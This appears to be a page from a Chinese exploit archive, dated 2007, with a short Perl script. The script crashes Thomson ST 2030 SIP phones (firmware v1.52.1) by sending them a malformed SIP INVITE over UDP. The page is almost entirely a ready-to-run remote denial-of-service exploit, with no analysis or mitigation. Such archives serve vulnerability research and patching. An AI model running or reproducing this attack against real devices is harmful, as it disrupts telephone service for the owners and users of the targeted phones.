Thomson SIP phone ST 2030 Remote Denial of Service Exploit
|
来源:www.vfocus.net 作者:MADYNES 发布时间:2007-08-28
|
|
#!/usr/bin/perl
#Vulneravility for Thomson 2030 firmware v1.52.1
#It provokes a DoS in the device.
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=00\r\nFrom: <sip:tucu\@192.168.1.2>;tag=00\r\nTo: <A15+-97:=:\%0B>;tag=00\r\nCall-ID: humbol\@192.168.1.2\r\nCSeq: 1 INVITE\r\n\r\n";
$socket->send($msg);
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|